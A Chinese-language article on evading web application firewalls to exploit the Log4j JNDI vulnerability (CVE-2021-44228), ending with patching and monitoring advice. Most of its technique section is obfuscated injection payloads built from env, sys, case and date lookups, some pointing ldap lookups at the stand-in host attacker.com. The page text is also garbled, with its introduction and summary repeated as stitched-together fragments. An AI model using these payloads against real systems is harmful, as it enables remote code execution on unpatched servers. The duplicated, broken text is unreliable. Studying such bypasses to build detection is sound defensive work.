Log4j WAF Bypass 技巧详细分析与总结<\/h1>

前言<\/h2>
Log4j漏洞（CVE-2021-44228）虽然是一个历史漏洞，但其WAF绕过技术仍然具有重要的研究价值。这个"核弹级"漏洞在没有完善防护的情况下，仍存在多种绕过手法值得探索。<\/p>

漏洞原理分析<\/h2>

关键组件<\/h3>

MessagePatternConverter<\/strong>：负责处理输入数据的转换器<\/li>

JndiLookup<\/strong>：实现JNDI功能的类，包含远程类加载的核心逻辑<\/li> <\/ol>
漏洞触发流程<\/h3>

输入数据经过多个转换器处理<\/li>
系统识别特殊标识符（如jndi<\/code>、{}<\/code>）<\/li>
在substitute<\/code>方法中提取并处理这些标识符<\/li>
通过resolveVariable<\/code>方法解析变量<\/li>
最终调用JndiLookup.lookup()<\/code>实现远程类加载<\/li> <\/ol> 常见WAF防护方法<\/h2> 大多数WAF会拦截包含以下关键字符的请求：<\/p> jndi<\/code><\/li> ladp<\/code><\/li> rmi<\/code><\/li> http<\/code>等协议标识<\/li> <\/ul> WAF绕过技巧<\/h2> 1. 环境变量绕过<\/h3> 利用Log4j的环境变量查找功能：<\/p> ${<\/span>env:<\/span>NOT_EXIST:-<\/span>j}<\/span>${<\/span>env:<\/span>NOT_EXIST:-<\/span>n}<\/span>${<\/span>env:<\/span>NOT_EXIST:-<\/span>d}<\/span>${<\/span>env:<\/span>NOT_EXIST:-<\/span>i}:...<\/span> <\/span><\/span><\/code><\/pre>原理：<\/p> 当环境变量不存在时返回默认值<\/li> 通过多个不存在的环境变量拼接出jndi<\/code>等关键词<\/li> <\/ul> 2. 大小写变形<\/h3> 全大写绕过<\/strong>：<\/p> ${<\/span>${<\/span>upper:<\/span>jndi}:<\/span>ldap:<\/span>\/\/attacker.com\/exp} <\/span><\/span><\/span><\/code><\/pre><\/li> 部分大写<\/strong>：<\/p> ${<\/span>jN${<\/span>lower:<\/span>d}<\/span>i:<\/span>ldap:<\/span>\/\/attacker.com\/exp} <\/span><\/span><\/span><\/code><\/pre><\/li> <\/ul> 注意：<\/p> ldap<\/code>协议名必须小写<\/li> 某些WAF对Unicode大写字符识别不完善<\/li> <\/ul> 3. 前置符干扰<\/h3> 在关键词中插入无效字符：<\/p> ${<\/span>jnd${::-<\/span>i}:<\/span>ldap:<\/span>\/\/attacker.com\/exp} <\/span><\/span><\/span><\/span>${<\/span>${::-<\/span>j}<\/span>${::-<\/span>n}<\/span>${::-<\/span>d}<\/span>${::-<\/span>i}:...}<\/span> <\/span><\/span><\/code><\/pre>原理：<\/p> WAF无法识别带干扰符的标签<\/li> Log4j会忽略无效字符并正确解析<\/li> <\/ul> 4. 系统属性绕过<\/h3> 利用sys:<\/code>查找系统属性：<\/p> ${<\/span>sys:<\/span>NOT_EXIST:-<\/span>j}<\/span>${<\/span>sys:<\/span>NOT_EXIST:-<\/span>n}<\/span>${<\/span>sys:<\/span>NOT_EXIST:-<\/span>d}<\/span>${<\/span>sys:<\/span>NOT_EXIST:-<\/span>i}:...<\/span> <\/span><\/span><\/code><\/pre>5. 日期标签绕过<\/h3> 利用date:<\/code>标签构造payload：<\/p> ${<\/span>${<\/span>date:<\/span>'j'<\/span>}<\/span>${<\/span>date:<\/span>'n'<\/span>}<\/span>${<\/span>date:<\/span>'d'<\/span>}<\/span>${<\/span>date:<\/span>'i'<\/span>}:...}<\/span> <\/span><\/span><\/code><\/pre>防御建议<\/h2> 升级至Log4j 2.17.0及以上版本<\/li> 设置log4j2.formatMsgNoLookups=true<\/code><\/li> 实施多层WAF规则：拦截各种大小写变形<\/li> 检测环境变量和系统属性滥用<\/li> 监控异常DNS查询和LDAP请求<\/li> <\/ul> <\/li> 限制出站网络连接<\/li> <\/ol> 总结<\/h2> Log4j漏洞的WAF绕过技术主要利用：<\/p> Log4j强大的变量解析功能<\/li> WAF规则与Log4j解析逻辑的差异<\/li> 多种上下文查找机制的滥用<\/li> <\/ol> 防御需要结合补丁更新、规则优化和网络监控等多重措施。<\/p>

Log4j WAF Bypass 技巧详细分析与总结<\/h1>

前言<\/h2> Log4j漏洞（CVE-2021-44228）虽然是一个历史漏洞，但其WAF绕过技术仍然具有重要的研究价值。这个"核弹级"漏洞在没有完善防护的情况下，仍存在多种绕过手法值得探索。<\/p>

漏洞原理分析<\/h2>

WAF绕过技巧<\/h2>

总结<\/h2> Log4j漏洞的WAF绕过技术主要利用：<\/p> Log4j强大的变量解析功能<\/li> WAF规则与Log4j解析逻辑的差异<\/li> 多种上下文查找机制的滥用<\/li> <\/ol> 防御需要结合补丁更新、规则优化和网络监控等多重措施。<\/p>

前言<\/h2>
Log4j漏洞（CVE-2021-44228）虽然是一个历史漏洞，但其WAF绕过技术仍然具有重要的研究价值。这个"核弹级"漏洞在没有完善防护的情况下，仍存在多种绕过手法值得探索。<\/p>

总结<\/h2>
Log4j漏洞的WAF绕过技术主要利用：<\/p>

Log4j强大的变量解析功能<\/li>
WAF规则与Log4j解析逻辑的差异<\/li>
多种上下文查找机制的滥用<\/li> <\/ol>
防御需要结合补丁更新、规则优化和网络监控等多重措施。<\/p>